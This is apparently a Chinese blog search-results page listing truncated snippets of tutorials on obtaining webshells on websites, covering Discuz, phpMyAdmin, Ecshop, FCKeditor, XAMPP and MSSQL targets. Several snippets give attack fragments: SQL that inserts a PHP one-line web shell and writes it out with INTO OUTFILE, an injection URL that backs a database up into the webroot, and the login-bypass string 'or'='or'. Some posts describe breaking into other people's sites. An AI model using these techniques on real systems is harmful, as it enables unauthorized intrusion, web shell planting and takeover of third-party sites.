    今天碰到一个dz的站,好久没拿了 ,拿下shell觉得...可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-server
  • 各种解析漏洞拿shell

    千次阅读 2018-11-18 23:55:55
    第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 wooyun.asp,那么 /wooyun.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以.....
  • ??最近怎么老研究智睿的网站系统,郁闷,以后别问我了,我不是智睿的官方,我只是碰巧看到这个系统写了个破解而已 已...多说无意义,今天为了进入一个人的后台给他写一个版权更改,没办法只能这样shell来写代码
  • discuz xss拿shell

    2019-05-26 10:06:28
    大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我...
  • SQLMAP怎么拿shell

    千次阅读 2020-03-04 20:25:46
    此外,在开篇之前,我也讲讲一些加快注入的方法,比如进入一个网站,你可以看见他的语言,然后大致判断出数据库的,或者用一些网站指纹和插件来判断,这样,在注入的时候可以–dbms = mysql,这...
  • 网站getshell方式总结

    2019-09-03 14:55:39
    1、直接上传木马文件 2、数据库备份getshell 获得可写的绝对路径后,将一句话写到数据库文件中,将数据库备份到指定路径,便可菜刀直连 ...4、利用文件解析漏洞拿shell 5、网站配置插马那webshel...
  • 任务二 注入点拿shell 路径的爆破 https://blog.csdn.net/edu_aqniu/article/details/78409451 0X01判断 是否为判断当前数据库用户名是否为DB_OWNER: 是 Mssql拿shell有两种方法 win2008sever里面 0X02...
  • xampp默认配置拿shell

    2016-12-23 22:26:00
    xampp默认配置拿shell  首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和...
  • xycms后台拿shell

    千次阅读 2016-11-25 00:42:56
    进入后台修改 网站名称 xxx网站"%> 修改成功后,菜刀连接 http://www.xxx.com /inc/config.asp
  • 怎样拿shell的技巧

    万次阅读 2016-02-19 13:53:20
    怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!经典的用户名密码 ‘or’=’or’ ‘or’1’=’1这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….inurl: 用于搜索网页上包含的URL. 这个...
  • shell 拿网站的httpcode

    2014-09-23 10:04:07
    #!/bin/bash for i in `cat url.txt` do STATUS_CODE=`curl -o /dev/null -s -m 13 --connect-timeout 13 -w %{http_code} $i` echo -e "$i:\t$STATUS_CODE" ...if [ $STATUS_CODE -ne 200 ];... echo -e "$i
  • 记Fck编辑器拿shell

    千次阅读 2017-04-29 17:31:15
    那天同学的QQ被黑发来的挂马网站手贱看了下。 用御剑扫描了一下。 有FCK编辑器。 但御剑扫出的url访问的页面不正常。 于是在网上查了查关于FCK编辑器的路径。 fckeditor/editor/filemanager/browser/...
  • PHPmyadmin漏洞和拿shell

    万次阅读 2017-04-06 09:31:34
    关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。 在getshell之前先进入一个数据库 第一种,使用sql...
  • PHPmyadmin拿shell总结

    2016-01-23 17:48:01
    拿shell四种经典方法: 方法一: CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/...
  • 科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。
  • 昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用...
  • Ecshop后台拿shell方法总结

    千次阅读 2016-11-25 17:17:17
    方法就像phpmyadmin一样直接操作sql语句导出一句话木马拿shell。 语句如下: show databases; use 数据库名;  create a(cmd text not null);  insert into a(cmd) values('($_POST[cmd]);?>'); ...
  • phpweb后台拿shell方法

    千次阅读 2016-11-19 08:44:17
    有的phpweb网站存在万能...登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。  然后选择你的马儿再上传 上传后如果为iis6,就点击查
  • mssql差异备份拿shell

    2019-10-11 19:54:59
    测试例子中我目标网站的绝对路径是E:\wwwroot\asp_sqli,数据库名是asp_test 1、 http : //192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:\wwwroot\asp_sqli\ddd.bak%27;...
  • phpweb后台拿shell简单方法

    千次阅读 2017-04-24 20:59:35
    关于phpweb后台拿shell简单方法。   首先登录后台admin.php   登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。    代码文件...
  • 说明 啊D注入工具最新版 有可能被杀软防火墙误报病毒 请关闭杀软后重试 密码123
  • ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术 标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 23,254
精华内容 9,301
关键字:

网站如何拿shell